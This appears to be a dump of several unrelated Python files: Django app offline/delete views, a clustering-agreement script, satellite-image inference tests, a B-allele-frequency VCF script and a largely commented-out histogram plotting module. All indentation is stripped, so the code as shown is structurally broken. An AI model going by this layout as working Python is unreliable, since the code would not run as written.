form_data = json.loads(request.POST.get("form_data", '{}'))
except Exception:
message = "参数错误!"
logger.exception("[app:%s] %s", app_code, message)
return BadRequestException(message)
# NOTE: 下架不加检查服务器, 因为此时已经提测/上线的, 所以默认可以下架成功
# 获取应用基本信息
app = App.objects.get(code=app_code)
# 状态判定
mode = form_data.get("mode", "all")
can_be_offline, message = app.can_be_offline(mode)
if not can_be_offline:
logger.info("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
# 执行下架
app_old_state = app.state
auth_token = app.auth_token
ok, event_id = app_to_offline_task(app_code, auth_token, username, mode, app_old_state)
# 操作流水日志
extra_data = {"username": username, "form_data": form_data}
_r(app_code, username, UserOperateTypeEnum.RELEASE_OFFLINE.value, extra_data)
if ok:
message = "下架事件提交成功!"
logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
return OKJsonResponse(message, event_id=event_id)
message = "下架事件提交失败!"
logger.info("[app:%s] %s event_id: %s", app_code, message, event_id)
return FailJsonResponse(message, event_id=event_id)
class ApplicationDeleteView(AppDeveloperRequiredMixin, View):
"""删除应用
"""
def post(self, request, *args, **kwargs):
app_code = self.kwargs["app_code"]
logger.info("[app:%s] 开始进行[删除]...", app_code)
username = request.user.username
app = App.objects.get(code=app_code)
can_be_deleted, message = app.can_be_deleted(username)
if not can_be_deleted:
logger.info("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
try:
SecureInfo.objects.filter(app_code=app_code).delete()
App.objects.filter(code=app_code).delete()
# 将APP的发布记录保存为上一次,避免下次创建时显示冲突
Record.objects.filter(app_code=app_code).update(version='last')
except Exception:
message = "删除失败!"
logger.exception("[app:%s] %s", app_code, message)
return FailJsonResponse(message)
# 操作流水日志
extra_data = {"username": username}
_r(app_code, username, UserOperateTypeEnum.APP_DELETE.value, extra_data)
message = "删除成功!"
logger.info("[app:%s] %s", app_code, message)
return OKJsonResponse(message)
class EventStatusView(AppDeveloperRequiredMixin, View):
"""查询事件状态
app 提测、上线、下架后台任务状态轮询
@return: result:0:失败,1:成功,2:正在执行
"""
def get(self, request, *args, **kwargs):
app_code = self.kwargs["app_code"]
event_id = request.GET.get("event_id", '')
ok, message, data = get_event_status(event_id, app_code, request=request)
result = {
"result": ok,
"message": message,
"data": data
}
return JsonResponse(result)
class UnfinishedTaskView(AppDeveloperRequiredMixin, View):
"""到app engine检查并更新最近10条未完成的task的状态
"""
def get(self, request, *args, **kwargs):
app_code = self.kwargs["app_code"]
app = App.objects.get(code=app_code)
records = Record.objects.get_last_ongoing_records(app_code, size=10)
for record in records:
event_id = record.event_id
event_ids = [event_id]
if record.operate_id == OperateIDEnum.IN_OFFLINE.value:
try:
event_ids = json.loads(record.extra_data).get("event_ids", [])
except Exception:
event_ids = [event_id]
ok, data = get_event_log(app_code=app_code, auth_token=app.auth_token, event_ids=event_ids)
if not ok:
continue
status = data.get("status")
# 判定操作时间, 超过了, 就判定是超时, 直接失败
expire_seconds = (datetime.datetime.now() - record.operate_time).total_seconds()
if (expire_seconds > settings.HISTORY_EVENT_STATE_EXPIRE_SECONDS
and status != EventStatusEnum.SUCCESS.value):
message = "check_unfinished_task, 事件超时({}s), 设置为失败".format(settings.HISTORY_EVENT_STATE_EXPIRE_SECONDS) # noqa
logger.info("[app:%s] %s, event_id:%s", app_code, message, event_id)
record.message = message
status = EventStatusEnum.FAILURE.value
if status in (EventStatusEnum.SUCCESS.value, EventStatusEnum.FAILURE.value):
record.is_success = (status == EventStatusEnum.SUCCESS.value)
to_operate_id = {OperateIDEnum.IN_TEST.value: OperateIDEnum.TO_TEST.value,
OperateIDEnum.IN_ONLINE.value: OperateIDEnum.TO_ONLINE.value,
OperateIDEnum.IN_OFFLINE.value: OperateIDEnum.TO_OFFLINE.value
}.get(record.operate_id, record.operate_id)
record.operate_id = to_operate_id
record.save()
return OKJsonResponse("success")
class LastReleaseRecordView(AppDeveloperRequiredMixin, JsonView):
"""获取部署最新的一条记录,用于刷新页面后继续轮询部署状态
"""
def get_context_data(self, **kwargs):
context = super(LastReleaseRecordView, self).get_context_data(**kwargs)
app_code = self.kwargs["app_code"]
try:
# 查询最近一条, 处于这几种状态的记录, 则是app的最新记录
record = Record.objects.get_app_newest_record(app_code)
context.update({
"result": True,
"message": "success",
"data": {
"record_id": record.id,
"event_id": record.event_id
}
})
return context
except Exception:
message = "[app:{}] {}".format(app_code, "get_last_release_record 查询错误!")
logger.exception(message)
context.update({
"result": False,
"message": message,
"data": {}
})
return context
|
python
|
#!/usr/bin/env python
# -*- coding: utf8
from __future__ import print_function, division
from pyksc import dist
import glob
import numpy as np
import os
import plac
import sys
def main(tseries_fpath, in_folder):
ids = []
with open(tseries_fpath) as tseries_file:
for l in tseries_file:
ids.append(l.split()[0])
ids = np.array(ids)
folders = glob.glob(os.path.join(in_folder, 'fold-*/ksc'))
num_folders = len(folders)
agree = 0
diff = 0
for i in xrange(num_folders):
base_i = os.path.dirname(folders[i])
Ci = np.loadtxt(os.path.join(folders[i], 'cents.dat'))
train_i = np.loadtxt(os.path.join(base_i, 'train.dat'), dtype='bool')
assign_i = np.loadtxt(os.path.join(folders[i], 'assign.dat'))
for j in xrange(i, num_folders):
base_j = os.path.dirname(folders[j])
Cj = np.loadtxt(os.path.join(folders[j], 'cents.dat'))
dists = dist.dist_all(Ci, Cj, rolling=True)[0]
argsrt = dists.argsort(axis=1)
train_j = np.loadtxt(os.path.join(base_j, 'train.dat'), dtype='bool')
assign_j = np.loadtxt(os.path.join(folders[j], 'assign.dat'))
for k in xrange(argsrt.shape[0]):
first = True
for o in argsrt[k]:
ids_k = set(ids[train_i][assign_i == k])
ids_o = set(ids[train_j][assign_j == o])
n_inter = len(ids_k.intersection(ids_o))
if first:
first = False
agree += n_inter
else:
diff += n_inter
print('AgreedProb = ', agree / (agree + diff))
print('DisagreeProb = ', diff / (agree + diff))
if __name__ == '__main__':
sys.exit(plac.call(main))
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Processor for CRGA models"""
import otbApplication
from decloud.core import system
import pyotb
import unittest
from decloud.production import crga_processor
from decloud.production.inference import inference
from .decloud_unittest import DecloudTest
import datetime
def get_timestamp(yyyymmdd):
dt = datetime.datetime.strptime(yyyymmdd, '%Y%m%d')
ts = dt.replace(tzinfo=datetime.timezone.utc).timestamp()
return str(ts)
class InferenceTest(DecloudTest):
def test_inference_with_mosaic(self):
# Logger
system.basic_logging_init()
# Baseline
baseline_path = self.get_path("baseline/reconstructed_baseline_w_mosaic.tif")
# Model
model_path = self.get_path("models/crga_os2david_occitanie_pretrained")
# Input sources
s1_tm1 = [
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20200929t060008_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20200930txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201001txxxxxx_from-10to3dB.tif')]
s2_tm1 = [
self.get_path(
'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200926-103901-393_L2A_T31TEJ_C_V2-2/SENTINEL2B_20200926-103901-393_L2A_T31TEJ_C_V2-2_FRE_10m.tif'),
self.get_path(
'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200929-104857-489_L2A_T31TEJ_C_V2-2/SENTINEL2B_20200929-104857-489_L2A_T31TEJ_C_V2-2_FRE_10m.tif')]
s1_t = [
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201011t060008_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201013txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201012txxxxxx_from-10to3dB.tif')]
s2_t = [
self.get_path(
'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201012-105848-497_L2A_T31TEJ_C_V2-2/SENTINEL2B_20201012-105848-497_L2A_T31TEJ_C_V2-2_FRE_10m.tif')]
s1_tp1 = [
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201025txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201024txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201023t060008_from-10to3dB.tif')]
s2_tp1 = [
self.get_path(
'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201026-103901-924_L2A_T31TEJ_C_V2-2/SENTINEL2B_20201026-103901-924_L2A_T31TEJ_C_V2-2_FRE_10m.tif'),
self.get_path(
'baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2A_20201024-104859-766_L2A_T31TEJ_C_V2-2/SENTINEL2A_20201024-104859-766_L2A_T31TEJ_C_V2-2_FRE_10m.tif')]
# Input sources
sources = {'s1_tm1': pyotb.Mosaic(il=s1_tm1, nodata=0),
's2_tm1': pyotb.Mosaic(il=s2_tm1, nodata=-10000),
's1_tp1': pyotb.Mosaic(il=s1_tp1, nodata=0),
's2_tp1': pyotb.Mosaic(il=s2_tp1, nodata=-10000),
's1_t': pyotb.Mosaic(il=s1_t, nodata=0),
's2_t': pyotb.Mosaic(il=s2_t, nodata=-10000),
'dem': self.get_path('baseline/PREPARE/DEM_PREPARE/T31TEJ.tif')}
# Sources scales
sources_scales = {"dem": 2}
# Inference
out_tensor = "s2_estim"
outpath = '/tmp/reconstructed_w_mosaic.tif'
processor = inference(sources=sources, sources_scales=sources_scales, pad=64,
ts=256, savedmodel_dir=model_path, out_tensor=out_tensor, out_nodatavalue=-10000,
out_pixeltype=otbApplication.ImagePixelType_int16,
nodatavalues={"s1_tm1": 0, "s2_tm1": -10000, "s1_tp1": 0,
"s2_tp1": -10000, "s1_t": 0, "s2_t": -10000})
processor.write(out=outpath, filename_extension="&streaming:type=tiled&streaming:sizemode=height&"
"streaming:sizevalue=256&"
"gdal:co:COMPRESS=DEFLATE&gdal:co:TILED=YES")
# Just a dummy test
self.assertTrue(system.file_exists(outpath))
self.compare_images(outpath, baseline_path)
self.compare_raster_metadata(outpath, baseline_path)
def test_inference_with_generic_preprocessor(self):
# Logger
system.basic_logging_init()
# Baseline
baseline_path = self.get_path("baseline/reconstructed_baseline_w_preprocessor.tif")
# Model
model_path = self.get_path("models/crga_os2david_occitanie_pretrained")
# Input sources
s1_tm1 = [
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20200929t060008_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20200930txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201001txxxxxx_from-10to3dB.tif')]
s2_tm1 = [
self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200926-103901-393_L2A_T31TEJ_C_V2-2/'),
self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20200929-104857-489_L2A_T31TEJ_C_V2-2/')]
s1_t = [
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201011t060008_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201013txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201012txxxxxx_from-10to3dB.tif')]
s2_t = self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201012-105848-497_L2A_T31TEJ_C_V2-2')
s1_tp1 = [
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_139_20201025txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1a_31TEJ_vvvh_DES_037_20201024txxxxxx_from-10to3dB.tif'),
self.get_path('baseline/PREPARE/S1_PREPARE/T31TEJ/s1b_31TEJ_vvvh_DES_110_20201023t060008_from-10to3dB.tif')]
s2_tp1 = [
self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2B_20201026-103901-924_L2A_T31TEJ_C_V2-2'),
self.get_path('baseline/PREPARE/S2_PREPARE/T31TEJ/SENTINEL2A_20201024-104859-766_L2A_T31TEJ_C_V2-2/')]
outpath = '/tmp/reconstructed_w_preprocessor.tif'
crga_processor.crga_processor(il_s1before=s1_tm1, il_s2before=s2_tm1,
il_s1=s1_t, in_s2=s2_t,
il_s1after=s1_tp1, il_s2after=s2_tp1,
dem=self.get_path('baseline/PREPARE/DEM_PREPARE/T31TEJ.tif'),
output=outpath, maxgap=48, savedmodel=model_path)
# Just a dummy test
self.assertTrue(system.file_exists(outpath))
self.compare_images(outpath, baseline_path)
self.compare_raster_metadata(outpath, baseline_path)
if __name__ == '__main__':
unittest.main()
|
python
|
#!/usr/bin/env python
# Copyright (c) 2018 Harold Wang, Ryan L. Collins, and the Talkowski Lab
# Distributed under terms of the MIT License (see LICENSE)
# Contact: Ryan L. Collins <[email protected]>
# gnomAD credits: http://gnomad.broadinstitute.org/
"""
Helper script for workflow to calculates B-allele frequencies
per sample from an input VCF file
"""
#Import libraries
import argparse
from collections import deque
import numpy as np
import pandas as pd
import pysam
import boto3
import sys
#Function to load an S3-hosted VCF
def load_s3vcf(bucket, vcf_path, index_filename=None):
"""
Load an S3-hosted VCF.
Parameters
----------
bucket : str
S3 bucket
vcf_path : str
S3 key
Returns
-------
vcf : pysam.VariantFile
"""
s3 = boto3.client('s3')
url = s3.generate_presigned_url(
ClientMethod='get_object',
Params={'Bucket': bucket, 'Key': vcf_path},
ExpiresIn=86400)
return pysam.VariantFile(url, index_filename=index_filename)
#Function to filter VCF records
def filter_records(record):
"""
Filter VCF records to those informative for BAF genotyping.
Returns only records which match all of the following criteria:
1) Biallelic
2) SNP
3) FILTER == PASS
Parameters
----------
records : iterator of pysam.VariantRecords
Returns
------
record : pysam.VariantRecord
"""
# for record in records:
# Restrict to biallelic sites
if len(record.alleles) > 2:
return
# Restrict to variants which PASS
if record.filter.keys() != ['PASS']:
return
# Restrict to SNPs
ref, alt = record.alleles
if len(ref) > 1 or len(alt) > 1:
return
return record
#Function to calculate BAF per VCF record
def calc_BAF(record, samples=None):
"""
Parameters
----------
record : pysam.VariantRecord
samples : list of str, optional
Subset of samples in record to consider
Returns
-------
bafs : np.ndarray of np.float
BAF at site for each sample
"""
def _is_het(sample):
return record.samples[sample]['GT'] == (0, 1)
def _calc_BAF(sample):
if not _is_het(sample):
return np.nan
DP = record.samples[sample]['DP']
AD = record.samples[sample]['AD']
if DP!=None and DP > 10: # SNP sites with >10 DP are included in BAF profile
return AD[0] / DP
else:
return np.nan
if samples is None:
samples = record.samples.keys()
bafs = np.atleast_2d(np.array([_calc_BAF(sample) for sample in samples], dtype=np.float))
return bafs
#Function to normalize BAF estimations
def normalize_bafs(bafs, max_std=0.2):
"""
Normalize BAFs and exclude outlying sites
Normalize so per variant median BAF==0.5. Ignore sites with more than 0.2 standard deviation across samples.
Parameters
----------
bafs : np.ndarray (n_sites x n_samples)
max_std : float, optional
Maximium standard deviation permitted at a site
Returns
-------
normalized_bafs : np.ndarray
"""
# Convert to n_samples x n_sites
bafs = bafs.transpose()
# Remove variants not informative in any sample (all NA)
bafs = bafs.loc[:, ~bafs.isnull().all()] # .copy()
# Remove sites with excessive variance
# Permit sites with a single sample (SD=NA)
std = bafs.std()
bafs = bafs.loc[:, ((std < max_std) | std.isnull())]
# Center each site's median BAF at 0.5
bafs = bafs - bafs.median()
bafs = bafs + 0.5
return bafs
#Main function
def main():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
# parser.add_argument('vcf', help='GATK VCF.')
# parser.add_argument('--tbi', help='Path to VCF index. (Required for tabix '
# 'querying when accessing an S3-hosted VCF.)')
# parser.add_argument('-w', '--window', type=int, default=None,
# help='Window outside variant start and end to query '
# 'for SNPs. Defaults to CNV length if not specified.')
# parser.add_argument('-s', '--samples', type=str, default=None,
# help='Samples')
# parser.add_argument('-i', '--ID', type=str, default='test',help='Samples')
# parser.add_argument('-t', '--type', type=str, default='test',help='Samples')
parser.add_argument('-b', '--batch', default='batch.txt')
# help='Samples')
args = parser.parse_args()
vcf = pysam.VariantFile(sys.stdin)
while True:
try:
record=next(vcf)
record=filter_records(record)
if record:
site=[record.pos]
site=np.array(site, dtype=np.int)
samples = list(vcf.header.samples)
baf=calc_BAF(record)
# print(baf.shape)
baf = pd.DataFrame(baf)
baf.columns = samples
baf = baf.set_index(site)
baf = normalize_bafs(baf)
baf.index.name = 'sample'
baf = baf.reset_index()
bf = pd.melt(baf, id_vars=['sample'], var_name='pos', value_name='baf')
bf = bf.loc[~bf.baf.isnull()]
called_bafs = bf
called_bafs['chrom'] = record.chrom
called_bafs['pos'] = called_bafs.pos.astype(int)
cols = 'chrom pos baf sample'.split()
called_bafs = called_bafs[cols]
if not called_bafs.empty:
called_bafs[cols].to_csv(sys.stdout, index=False, mode='a',header=False, sep='\t')
except StopIteration:
break
#Main block
if __name__ == '__main__':
main()
|
python
|
"""Lib module for daq sub units"""
pass
|
python
|
#!/usr/bin/env python
r"""Aggregate, create, and save 1D and 2D histograms and binned plots.
"""
from . import agg_plot
from . import hist1d
from . import hist2d
AggPlot = agg_plot.AggPlot
Hist1D = hist1d.Hist1D
Hist2D = hist2d.Hist2D
# import pdb # noqa: F401
# import logging
# import numpy as np
# import pandas as pd
# import matplotlib as mpl
# from types import FunctionType
# from numbers import Number
# from matplotlib import pyplot as plt
# from abc import abstractproperty, abstractmethod
# from collections import namedtuple
# from scipy.signal import savgol_filter
# try:
# from astropy.stats import knuth_bin_width
# except ModuleNotFoundError:
# pass
# from . import tools
# from . import base
# from . import labels as labels_module
# # import os
# # import psutil
# # def log_mem_usage():
# # usage = psutil.Process(os.getpid()).memory_info()
# # usage = "\n".join(
# # ["{} {:.3f} GB".format(k, v * 1e-9) for k, v in usage._asdict().items()]
# # )
# # logging.getLogger("main").warning("Memory usage\n%s", usage)
# class AggPlot(base.Base):
# r"""ABC for aggregating data in 1D and 2D.
# Properties
# ----------
# logger, data, bins, clip, cut, logx, labels.x, labels.y, clim, agg_axes
# Methods
# -------
# set_<>:
# Set property <>.
# calc_bins, make_cut, agg, clip_data, make_plot
# Abstract Properties
# -------------------
# path, _gb_axes
# Abstract Methods
# ----------------
# __init__, set_labels.y, set_path, set_data, _format_axis, make_plot
# """
# @property
# def edges(self):
# return {k: v.left.union(v.right) for k, v in self.intervals.items()}
# @property
# def categoricals(self):
# return dict(self._categoricals)
# @property
# def intervals(self):
# # return dict(self._intervals)
# return {k: pd.IntervalIndex(v) for k, v in self.categoricals.items()}
# @property
# def cut(self):
# return self._cut
# @property
# def clim(self):
# return self._clim
# @property
# def agg_axes(self):
# r"""The axis to aggregate into, e.g. the z variable in an (x, y, z) heatmap.
# """
# tko = [c for c in self.data.columns if c not in self._gb_axes]
# assert len(tko) == 1
# tko = tko[0]
# return tko
# @property
# def joint(self):
# r"""A combination of the categorical and continuous data for use in `Groupby`.
# """
# # cut = self.cut
# # tko = self.agg_axes
# # self.logger.debug(f"Joining data ({tko}) with cat ({cut.columns.values})")
# # other = self.data.loc[cut.index, tko]
# # # joint = pd.concat([cut, other.to_frame(name=tko)], axis=1, sort=True)
# # joint = cut.copy(deep=True)
# # joint.loc[:, tko] = other
# # joint.sort_index(axis=1, inplace=True)
# # return joint
# cut = self.cut
# tk_target = self.agg_axes
# target = self.data.loc[cut.index, tk_target]
# mi = pd.MultiIndex.from_frame(cut)
# target.index = mi
# return target
# @property
# def grouped(self):
# r"""`joint.groupby` with appropriate axes passes.
# """
# # tko = self.agg_axes
# # gb = self.data.loc[:, tko].groupby([v for k, v in self.cut.items()], observed=False)
# # gb = self.joint.groupby(list(self._gb_axes))
# # cut = self.cut
# # tk_target = self.agg_axes
# # target = self.data.loc[cut.index, tk_target]
# # mi = pd.MultiIndex.from_frame(cut)
# # target.index = mi
# target = self.joint
# gb_axes = list(self._gb_axes)
# gb = target.groupby(gb_axes, axis=0, observed=True)
# # agg_axes = self.agg_axes
# # gb = (
# # self.joint.set_index(gb_axes)
# # .loc[:, agg_axes]
# # .groupby(gb_axes, axis=0, observed=False)
# # )
# return gb
# @property
# def axnorm(self):
# r"""Data normalization in plot.
# Not `mpl.colors.Normalize` instance. That is passed as a `kwarg` to
# `make_plot`.
# """
# return self._axnorm
# # Old version that cuts at percentiles.
# @staticmethod
# def clip_data(data, clip):
# q0 = 0.0001
# q1 = 0.9999
# pct = data.quantile([q0, q1])
# lo = pct.loc[q0]
# up = pct.loc[q1]
# if isinstance(data, pd.Series):
# ax = 0
# elif isinstance(data, pd.DataFrame):
# ax = 1
# else:
# raise TypeError("Unexpected object %s" % type(data))
# if isinstance(clip, str) and clip.lower()[0] == "l":
# data = data.clip_lower(lo, axis=ax)
# elif isinstance(clip, str) and clip.lower()[0] == "u":
# data = data.clip_upper(up, axis=ax)
# else:
# data = data.clip(lo, up, axis=ax)
# return data
# # New version that uses binning to cut.
# # @staticmethod
# # def clip_data(data, bins, clip):
# # q0 = 0.001
# # q1 = 0.999
# # pct = data.quantile([q0, q1])
# # lo = pct.loc[q0]
# # up = pct.loc[q1]
# # lo = bins.iloc[0]
# # up = bins.iloc[-1]
# # if isinstance(clip, str) and clip.lower()[0] == "l":
# # data = data.clip_lower(lo)
# # elif isinstance(clip, str) and clip.lower()[0] == "u":
# # data = data.clip_upper(up)
# # else:
# # data = data.clip(lo, up)
# # return data
# def set_clim(self, lower=None, upper=None):
# f"""Set the minimum (lower) and maximum (upper) alowed number of
# counts/bin to return aftter calling :py:meth:`{self.__class__.__name__}.add()`.
# """
# assert isinstance(lower, Number) or lower is None
# assert isinstance(upper, Number) or upper is None
# self._clim = (lower, upper)
# def calc_bins_intervals(self, nbins=101, precision=None):
# r"""
# Calculate histogram bins.
# nbins: int, str, array-like
# If int, use np.histogram to calculate the bin edges.
# If str and nbins == "knuth", use `astropy.stats.knuth_bin_width`
# to calculate optimal bin widths.
# If str and nbins != "knuth", use `np.histogram(data, bins=nbins)`
# to calculate bins.
# If array-like, treat as bins.
# precision: int or None
# Precision at which to store intervals. If None, default to 3.
# """
# data = self.data
# bins = {}
# intervals = {}
# if precision is None:
# precision = 5
# gb_axes = self._gb_axes
# if isinstance(nbins, (str, int)) or (
# hasattr(nbins, "__iter__") and len(nbins) != len(gb_axes)
# ):
# # Single paramter for `nbins`.
# nbins = {k: nbins for k in gb_axes}
# elif len(nbins) == len(gb_axes):
# # Passed one bin spec per axis
# nbins = {k: v for k, v in zip(gb_axes, nbins)}
# else:
# msg = f"Unrecognized `nbins`\ntype: {type(nbins)}\n bins:{nbins}"
# raise ValueError(msg)
# for k in self._gb_axes:
# b = nbins[k]
# # Numpy and Astropy don't like NaNs when calculating bins.
# # Infinities in bins (typically from log10(0)) also create problems.
# d = data.loc[:, k].replace([-np.inf, np.inf], np.nan).dropna()
# if isinstance(b, str):
# b = b.lower()
# if isinstance(b, str) and b == "knuth":
# try:
# assert knuth_bin_width
# except NameError:
# raise NameError("Astropy is unavailable.")
# dx, b = knuth_bin_width(d, return_bins=True)
# else:
# try:
# b = np.histogram_bin_edges(d, b)
# except MemoryError:
# # Clip the extremely large values and extremely small outliers.
# lo, up = d.quantile([0.0005, 0.9995])
# b = np.histogram_bin_edges(d.clip(lo, up), b)
# except AttributeError:
# c, b = np.histogram(d, b)
# assert np.unique(b).size == b.size
# try:
# assert not np.isnan(b).any()
# except TypeError:
# assert not b.isna().any()
# b = b.round(precision)
# zipped = zip(b[:-1], b[1:])
# i = [pd.Interval(*b0b1, closed="right") for b0b1 in zipped]
# bins[k] = b
# # intervals[k] = pd.IntervalIndex(i)
# intervals[k] = pd.CategoricalIndex(i)
# bins = tuple(bins.items())
# intervals = tuple(intervals.items())
# # self._intervals = intervals
# self._categoricals = intervals
# def make_cut(self):
# r"""Calculate the `Categorical` quantities for the aggregation axes.
# """
# intervals = self.intervals
# data = self.data
# cut = {}
# for k in self._gb_axes:
# d = data.loc[:, k]
# i = intervals[k]
# if self.clip:
# d = self.clip_data(d, self.clip)
# c = pd.cut(d, i)
# cut[k] = c
# cut = pd.DataFrame.from_dict(cut, orient="columns")
# self._cut = cut
# def _agg_runner(self, cut, tko, gb, fcn, **kwargs):
# r"""Refactored out the actual doing of the aggregation so that :py:class:`OrbitPlot`
# can aggregate (Inbound, Outbound, and Both).
# """
# self.logger.debug(f"aggregating {tko} data along {cut.columns.values}")
# if fcn is None:
# other = self.data.loc[cut.index, tko]
# if other.dropna().unique().size == 1:
# fcn = "count"
# else:
# fcn = "mean"
# agg = gb.agg(fcn, **kwargs) # .loc[:, tko]
# c0, c1 = self.clim
# if c0 is not None or c1 is not None:
# cnt = gb.agg("count") # .loc[:, tko]
# tk = pd.Series(True, index=agg.index)
# # tk = pd.DataFrame(True,
# # index=agg.index,
# # columns=agg.columns
# # )
# if c0 is not None:
# tk = tk & (cnt >= c0)
# if c1 is not None:
# tk = tk & (cnt <= c1)
# agg = agg.where(tk)
# # # Using `observed=False` in `self.grouped` raised a TypeError because mixed Categoricals and np.nans. (20200229)
# # # Ensure all bins are represented in the data. (20190605)
# # # for k, v in self.intervals.items():
# # for k, v in self.categoricals.items():
# # # if > 1 intervals, pass level. Otherwise, don't as this raises a NotImplementedError. (20190619)
# # agg = agg.reindex(index=v, level=k if agg.index.nlevels > 1 else None)
# return agg
# def _agg_reindexer(self, agg):
# # Using `observed=False` in `self.grouped` raised a TypeError because mixed Categoricals and np.nans. (20200229)
# # Ensure all bins are represented in the data. (20190605)
# # for k, v in self.intervals.items():
# for k, v in self.categoricals.items():
# # if > 1 intervals, pass level. Otherwise, don't as this raises a NotImplementedError. (20190619)
# agg = agg.reindex(index=v, level=k if agg.index.nlevels > 1 else None)
# return agg
# def agg(self, fcn=None, **kwargs):
# r"""Perform the aggregation along the agg axes.
# If either of the count limits specified in `clim` are not None, apply them.
# `fcn` allows you to specify a specific function for aggregation. Otherwise,
# automatically choose "count" or "mean" based on the uniqueness of the aggregated
# values.
# """
# cut = self.cut
# tko = self.agg_axes
# self.logger.info(
# f"Starting {self.__class__.__name__!s} aggregation of ({tko}) in ({cut.columns.values})\n%s",
# "\n".join([f"{k!s}: {v!s}" for k, v in self.labels._asdict().items()]),
# )
# gb = self.grouped
# agg = self._agg_runner(cut, tko, gb, fcn, **kwargs)
# return agg
# def get_plotted_data_boolean_series(self):
# f"""A boolean `pd.Series` identifing each measurement that is plotted.
# Note: The Series is indexed identically to the data stored in the :py:class:`{self.__class__.__name__}`.
# To align with another index, you may want to use:
# tk = {self.__class__.__name__}.get_plotted_data_boolean_series()
# idx = tk.replace(False, np.nan).dropna().index
# """
# agg = self.agg().dropna()
# cut = self.cut
# tk = pd.Series(True, index=cut.index)
# for k, v in cut.items():
# chk = agg.index.get_level_values(k)
# # Use the codes directly because the categoricals are
# # failing with some Pandas numpy ufunc use. (20200611)
# chk = pd.CategoricalIndex(chk)
# tk_ax = v.cat.codes.isin(chk.codes)
# tk = tk & tk_ax
# self.logger.info(
# f"Taking {tk.sum()!s} ({100*tk.mean():.1f}%) {self.__class__.__name__} spectra"
# )
# return tk
# # Old version that cuts at percentiles.
# # @staticmethod
# # def clip_data(data, clip):
# # q0 = 0.0001
# # q1 = 0.9999
# # pct = data.quantile([q0, q1])
# # lo = pct.loc[q0]
# # up = pct.loc[q1]
# #
# # if isinstance(data, pd.Series):
# # ax = 0
# # elif isinstance(data, pd.DataFrame):
# # ax = 1
# # else:
# # raise TypeError("Unexpected object %s" % type(data))
# #
# # if isinstance(clip, str) and clip.lower()[0] == "l":
# # data = data.clip_lower(lo, axis=ax)
# # elif isinstance(clip, str) and clip.lower()[0] == "u":
# # data = data.clip_upper(up, axis=ax)
# # else:
# # data = data.clip(lo, up, axis=ax)
# # return data
# #
# # New version that uses binning to cut.
# # @staticmethod
# # def clip_data(data, bins, clip):
# # q0 = 0.001
# # q1 = 0.999
# # pct = data.quantile([q0, q1])
# # lo = pct.loc[q0]
# # up = pct.loc[q1]
# # lo = bins.iloc[0]
# # up = bins.iloc[-1]
# # if isinstance(clip, str) and clip.lower()[0] == "l":
# # data = data.clip_lower(lo)
# # elif isinstance(clip, str) and clip.lower()[0] == "u":
# # data = data.clip_upper(up)
# # else:
# # data = data.clip(lo, up)
# # return data
# @abstractproperty
# def _gb_axes(self):
# r"""The axes or columns over which the `groupby` aggregation takes place.
# 1D cases aggregate over `x`. 2D cases aggregate over `x` and `y`.
# """
# pass
# @abstractmethod
# def set_axnorm(self, new):
# r"""The method by which the gridded data is normalized.
# """
# pass
# class Hist1D(AggPlot):
# r"""Create 1D plot of `x`, optionally aggregating `y` in bins of `x`.
# Properties
# ----------
# _gb_axes, path
# Methods
# -------
# set_path, set_data, agg, _format_axis, make_plot
# """
# def __init__(
# self,
# x,
# y=None,
# logx=False,
# axnorm=None,
# clip_data=False,
# nbins=101,
# bin_precision=None,
# ):
# r"""
# Parameters
# ----------
# x: pd.Series
# Data from which to create bins.
# y: pd.Series, None
# If not None, the values to aggregate in bins of `x`. If None,
